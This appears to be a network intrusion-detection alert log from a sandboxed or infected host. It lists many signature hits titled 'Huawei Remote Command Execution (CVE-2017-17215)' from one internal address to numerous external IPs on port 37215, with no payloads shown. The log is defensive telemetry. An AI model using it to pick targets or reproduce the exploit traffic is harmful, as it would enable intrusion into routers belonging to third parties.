                                            06/14/24-10:43:48.031708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493237215192.168.2.1441.1.231.31
                                            06/14/24-10:43:39.791084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181637215192.168.2.1441.3.0.148
                                            06/14/24-10:44:06.452061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5613637215192.168.2.1441.8.161.2
                                            06/14/24-10:44:24.914840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5468237215192.168.2.1441.192.133.9
                                            06/14/24-10:44:16.737191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517237215192.168.2.1441.247.134.250
                                            06/14/24-10:43:50.071972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259637215192.168.2.14156.119.6.158
                                            06/14/24-10:43:41.850484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374837215192.168.2.14197.94.33.146
                                            06/14/24-10:43:52.164624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691237215192.168.2.1441.246.251.40
                                            06/14/24-10:44:35.182446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824837215192.168.2.14156.249.94.242
                                            06/14/24-10:44:10.545368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824637215192.168.2.14197.140.222.184
                                            06/14/24-10:43:41.846712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5247637215192.168.2.14197.28.230.71
                                            06/14/24-10:44:35.180154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564037215192.168.2.14197.23.250.12
                                            06/14/24-10:44:08.521517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781037215192.168.2.1441.158.154.189
                                            06/14/24-10:43:37.761325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880437215192.168.2.1441.187.128.117
                                            06/14/24-10:43:50.074928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905037215192.168.2.14156.241.213.209
                                            06/14/24-10:44:00.325668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5760237215192.168.2.14156.16.203.193
                                            06/14/24-10:43:43.942691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651037215192.168.2.1441.230.87.80
                                            06/14/24-10:44:02.384973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854437215192.168.2.14197.84.54.31
                                            06/14/24-10:44:10.548795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667637215192.168.2.1441.189.41.12
                                            06/14/24-10:43:52.150862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5571237215192.168.2.1441.253.132.254
                                            06/14/24-10:43:56.253434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5376437215192.168.2.14156.86.39.145
                                            06/14/24-10:43:52.146474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700637215192.168.2.14197.14.102.91
                                            06/14/24-10:43:41.906521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4858637215192.168.2.1441.217.47.225
                                            06/14/24-10:44:04.408738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946237215192.168.2.1441.252.186.249
                                            06/14/24-10:44:20.830911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5938037215192.168.2.1441.160.172.248
                                            06/14/24-10:43:39.791523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001637215192.168.2.14197.27.182.101
                                            06/14/24-10:43:43.943047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601237215192.168.2.14197.166.36.132
                                            06/14/24-10:43:48.032239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808637215192.168.2.14156.65.128.184
                                            06/14/24-10:44:06.453112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970637215192.168.2.14156.225.160.213
                                            06/14/24-10:44:14.667567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029037215192.168.2.14197.179.90.96
                                            06/14/24-10:43:58.289025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142237215192.168.2.14197.2.241.120
                                            06/14/24-10:44:20.806869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544437215192.168.2.14156.189.34.63
                                            06/14/24-10:43:58.295553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283437215192.168.2.14197.121.199.182
                                            06/14/24-10:44:31.055793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4584637215192.168.2.1441.213.57.89
                                            06/14/24-10:43:52.163103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884437215192.168.2.1441.85.186.208
                                            06/14/24-10:44:00.338532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309837215192.168.2.14197.167.120.33
                                            06/14/24-10:44:12.616026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4476437215192.168.2.14197.3.214.197
                                            06/14/24-10:44:22.862125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727437215192.168.2.1441.72.57.0
                                            06/14/24-10:44:22.859575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567837215192.168.2.1441.254.224.72
                                            06/14/24-10:43:41.896393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6058237215192.168.2.1441.26.203.87
                                            06/14/24-10:43:54.202086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206037215192.168.2.14197.102.160.32
                                            06/14/24-10:43:58.276179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133637215192.168.2.14197.85.78.65
                                            06/14/24-10:43:56.243037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053837215192.168.2.14197.109.42.35
                                            06/14/24-10:43:58.274369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033437215192.168.2.14197.102.204.78
                                            06/14/24-10:44:06.471240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848037215192.168.2.14156.15.194.222
                                            06/14/24-10:44:06.453836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291637215192.168.2.1441.9.122.55
                                            06/14/24-10:44:29.011324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3682237215192.168.2.14156.89.216.51
                                            06/14/24-10:43:43.943897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3537637215192.168.2.14197.133.76.151
                                            06/14/24-10:44:24.918036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6039037215192.168.2.14156.198.56.155
                                            06/14/24-10:44:20.831280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671237215192.168.2.1441.32.235.22
                                            06/14/24-10:43:34.663486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437437215192.168.2.1441.150.127.110
                                            06/14/24-10:44:18.779535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790437215192.168.2.1441.228.92.40
                                            06/14/24-10:44:00.323813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607237215192.168.2.14156.180.44.71
                                            06/14/24-10:43:36.701643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5391237215192.168.2.1441.214.90.82
                                            06/14/24-10:43:58.291701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969837215192.168.2.14156.192.118.226
                                            06/14/24-10:44:20.805037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3425637215192.168.2.14197.140.51.232
                                            06/14/24-10:44:04.419487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576237215192.168.2.1441.36.87.66
                                            06/14/24-10:44:24.941995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4421637215192.168.2.1441.31.205.245
                                            06/14/24-10:44:20.807518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258637215192.168.2.1441.146.88.115
                                            06/14/24-10:43:50.073753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4456237215192.168.2.14156.13.176.72
                                            06/14/24-10:44:33.134845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627637215192.168.2.1441.207.85.184
                                            06/14/24-10:44:12.614192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870037215192.168.2.1441.100.67.194
                                            06/14/24-10:44:12.624790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439837215192.168.2.14197.70.204.15
                                            06/14/24-10:43:56.246095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815037215192.168.2.14197.99.47.100
                                            06/14/24-10:44:18.777360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039437215192.168.2.14197.186.155.199
                                            06/14/24-10:44:16.735415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4638237215192.168.2.1441.163.162.179
                                            06/14/24-10:44:29.010699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585237215192.168.2.14197.195.227.182
                                            06/14/24-10:44:22.879908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012037215192.168.2.1441.26.168.245
                                            06/14/24-10:44:31.057307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770437215192.168.2.14156.234.150.45
                                            06/14/24-10:44:04.411018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792237215192.168.2.14156.60.22.158
                                            06/14/24-10:44:08.503033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066637215192.168.2.1441.255.117.117
                                            06/14/24-10:44:08.502102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449837215192.168.2.14197.238.42.236
                                            06/14/24-10:43:36.726077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445837215192.168.2.14156.255.194.141
                                            06/14/24-10:44:31.091243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4384837215192.168.2.14156.169.180.162
                                            06/14/24-10:44:00.338082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3792437215192.168.2.14156.41.8.116
                                            06/14/24-10:44:22.879047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414637215192.168.2.14156.198.200.252
                                            06/14/24-10:43:48.018009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679037215192.168.2.14156.227.223.192
                                            06/14/24-10:44:10.544317TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788637215192.168.2.14197.243.120.27
                                            06/14/24-10:43:48.032721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216237215192.168.2.14156.103.40.158
                                            06/14/24-10:43:34.660377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3856837215192.168.2.1441.245.235.255
                                            06/14/24-10:44:31.055453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848037215192.168.2.14156.238.62.246
                                            06/14/24-10:43:39.811335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4126437215192.168.2.1441.213.98.76
                                            06/14/24-10:43:41.849050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475637215192.168.2.14197.64.244.2
                                            06/14/24-10:44:18.777820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758037215192.168.2.1441.28.186.226
                                            06/14/24-10:44:06.471750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110437215192.168.2.1441.35.125.202
                                            06/14/24-10:44:24.915320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693637215192.168.2.14156.41.61.173
                                            06/14/24-10:43:36.717459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641637215192.168.2.14156.202.150.224
                                            06/14/24-10:44:22.880908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501237215192.168.2.14156.0.22.20
                                            06/14/24-10:44:29.013223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581237215192.168.2.1441.61.130.166
                                            06/14/24-10:43:50.111246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4231237215192.168.2.14197.42.107.250
                                            06/14/24-10:44:14.689618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694237215192.168.2.1441.195.7.106
                                            06/14/24-10:43:43.942170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5417037215192.168.2.14156.213.186.27
                                            06/14/24-10:44:29.023553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5992037215192.168.2.14197.232.98.8
                                            06/14/24-10:43:54.201809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659437215192.168.2.1441.59.163.98
                                            06/14/24-10:43:54.185298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590837215192.168.2.1441.146.163.157
                                            06/14/24-10:44:31.081815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557037215192.168.2.14197.8.2.121
                                            06/14/24-10:43:58.273135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311837215192.168.2.14197.175.60.168
                                            06/14/24-10:43:39.790553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048437215192.168.2.14197.101.243.29
                                            06/14/24-10:43:37.761099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420837215192.168.2.14156.238.63.246
                                            06/14/24-10:44:06.470246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093637215192.168.2.1441.57.241.235
                                            06/14/24-10:43:48.033783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599237215192.168.2.14156.154.224.207
                                            06/14/24-10:44:12.646489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4191637215192.168.2.14197.14.175.192
                                            06/14/24-10:44:12.643340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032037215192.168.2.14197.247.104.126
                                            06/14/24-10:44:33.133721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607837215192.168.2.14156.7.63.227
                                            06/14/24-10:44:33.134032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678037215192.168.2.14156.51.110.2
                                            06/14/24-10:44:10.544230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643437215192.168.2.14156.47.48.36
                                            06/14/24-10:43:41.849191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5278837215192.168.2.14156.29.42.180
                                            06/14/24-10:44:18.766173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324037215192.168.2.14156.128.167.82
                                            06/14/24-10:44:29.023431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219637215192.168.2.1441.186.21.125
                                            06/14/24-10:44:18.761827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623837215192.168.2.14197.157.84.85
                                            06/14/24-10:44:14.689518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322037215192.168.2.14156.40.237.209
                                            06/14/24-10:44:18.761684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702037215192.168.2.1441.9.166.61
                                            06/14/24-10:43:52.147148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405237215192.168.2.1441.22.236.91
                                            06/14/24-10:43:50.072387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932637215192.168.2.14156.33.42.173
                                            06/14/24-10:43:58.290604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073237215192.168.2.14197.103.227.84
                                            06/14/24-10:44:24.916196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921637215192.168.2.14156.97.137.77
                                            06/14/24-10:44:14.683937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3900637215192.168.2.14197.156.1.158
                                            06/14/24-10:43:41.850238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044437215192.168.2.1441.105.248.161
                                            06/14/24-10:43:34.660871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663437215192.168.2.14156.149.180.35
                                            06/14/24-10:43:34.662002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3574037215192.168.2.1441.48.170.201
                                            06/14/24-10:43:58.294081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421437215192.168.2.14156.160.70.77
                                            06/14/24-10:44:08.504953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972237215192.168.2.14197.220.10.204
                                            06/14/24-10:44:16.717584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944837215192.168.2.14156.195.130.93
                                            06/14/24-10:44:24.932410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148037215192.168.2.14197.211.215.27
                                            06/14/24-10:43:36.718414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238037215192.168.2.14197.176.87.234
                                            06/14/24-10:44:04.410905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639237215192.168.2.14156.47.158.255
                                            06/14/24-10:44:26.979576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5606837215192.168.2.1441.207.118.84
                                            06/14/24-10:44:10.546326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478037215192.168.2.14197.113.82.195
                                            06/14/24-10:44:14.685105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035437215192.168.2.1441.106.126.191
                                            06/14/24-10:44:08.519770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157237215192.168.2.1441.12.211.121
                                            06/14/24-10:44:18.761881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435837215192.168.2.14197.249.106.137
                                            06/14/24-10:44:14.685303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4020637215192.168.2.14197.173.255.92
                                            06/14/24-10:44:29.024796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599637215192.168.2.1441.17.77.147
                                            06/14/24-10:44:08.501263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277637215192.168.2.1441.197.173.172
                                            06/14/24-10:44:16.735947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706637215192.168.2.1441.9.190.46
                                            06/14/24-10:44:26.999807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894037215192.168.2.14156.147.154.213
                                            06/14/24-10:44:02.381161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478237215192.168.2.1441.166.213.178
                                            06/14/24-10:43:34.663151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327437215192.168.2.1441.32.235.166
                                            06/14/24-10:44:22.882346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383637215192.168.2.14197.146.147.242
                                            06/14/24-10:43:37.758982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004637215192.168.2.1441.208.88.155
                                            06/14/24-10:44:04.408674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066437215192.168.2.1441.109.82.101
                                            06/14/24-10:44:18.763079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533437215192.168.2.14156.45.209.143
                                            06/14/24-10:43:50.110926TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465637215192.168.2.14197.197.211.124
                                            06/14/24-10:44:10.568597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998237215192.168.2.14197.238.89.161
                                            06/14/24-10:43:58.275847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297637215192.168.2.1441.226.114.9
                                            06/14/24-10:44:31.087878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5725837215192.168.2.14197.125.90.16
                                            06/14/24-10:43:37.759491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5955237215192.168.2.14156.180.201.104
                                            06/14/24-10:44:12.640827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275637215192.168.2.14197.229.211.181
                                            06/14/24-10:43:54.185553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4597037215192.168.2.14197.7.231.94
                                            06/14/24-10:44:04.410477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265437215192.168.2.1441.105.33.115
                                            06/14/24-10:43:43.968764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627037215192.168.2.14197.226.16.15
                                            06/14/24-10:43:58.276286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3979437215192.168.2.14197.246.27.4
                                            06/14/24-10:44:24.915454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5730037215192.168.2.1441.118.240.87
                                            06/14/24-10:43:43.943137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023837215192.168.2.14197.60.83.206
                                            06/14/24-10:43:52.145995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652237215192.168.2.14156.68.231.23
                                            06/14/24-10:44:31.082214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677037215192.168.2.14197.4.242.209
                                            06/14/24-10:44:06.452882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803037215192.168.2.14156.32.46.44
                                            06/14/24-10:44:24.916946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732437215192.168.2.14156.58.59.247
                                            06/14/24-10:44:18.778073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475037215192.168.2.14156.42.151.174
                                            06/14/24-10:44:10.562927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4314037215192.168.2.1441.104.183.150
                                            06/14/24-10:44:14.669255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281837215192.168.2.14156.74.82.152
                                            06/14/24-10:44:22.858759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5119637215192.168.2.14197.57.43.231
                                            06/14/24-10:44:12.640726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674637215192.168.2.14197.110.124.111
                                            06/14/24-10:43:41.849921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639037215192.168.2.14156.82.174.117
                                            06/14/24-10:44:08.517590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473237215192.168.2.1441.236.216.31
                                            06/14/24-10:44:20.829935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788237215192.168.2.14197.30.248.27
                                            06/14/24-10:43:54.201680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743237215192.168.2.14156.32.215.0
                                            06/14/24-10:43:52.146025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887037215192.168.2.14156.200.15.122
                                            06/14/24-10:44:10.563869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174437215192.168.2.14197.87.28.85
                                            06/14/24-10:43:56.226035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915437215192.168.2.14197.144.20.50
                                            06/14/24-10:44:00.326679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274237215192.168.2.14156.114.167.209
                                            06/14/24-10:43:56.244551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769037215192.168.2.1441.41.104.151
                                            06/14/24-10:44:12.646923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544837215192.168.2.14156.212.182.64
                                            06/14/24-10:44:24.915041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598437215192.168.2.14197.6.23.35
                                            06/14/24-10:43:56.228877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120437215192.168.2.1441.215.103.116
                                            06/14/24-10:44:33.131679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473837215192.168.2.14197.130.210.113
                                            06/14/24-10:44:02.386267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5367837215192.168.2.14197.243.171.190
                                            06/14/24-10:44:10.568701TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900837215192.168.2.1441.201.207.200
                                            06/14/24-10:44:06.448812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669437215192.168.2.1441.47.211.197
                                            06/14/24-10:44:31.054037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684637215192.168.2.14156.248.148.15
                                            06/14/24-10:44:04.419924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930237215192.168.2.14197.207.32.74
                                            06/14/24-10:44:14.670838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039437215192.168.2.1441.152.168.162
                                            06/14/24-10:43:36.725276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203437215192.168.2.14197.70.225.57
                                            06/14/24-10:43:56.226826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3313637215192.168.2.1441.164.186.159
                                            06/14/24-10:43:45.967951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082837215192.168.2.14156.49.26.239
                                            06/14/24-10:43:48.018982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327637215192.168.2.14197.153.95.152
                                            06/14/24-10:43:54.184536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034437215192.168.2.14197.212.46.56
                                            06/14/24-10:44:22.880239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560037215192.168.2.14197.221.57.33
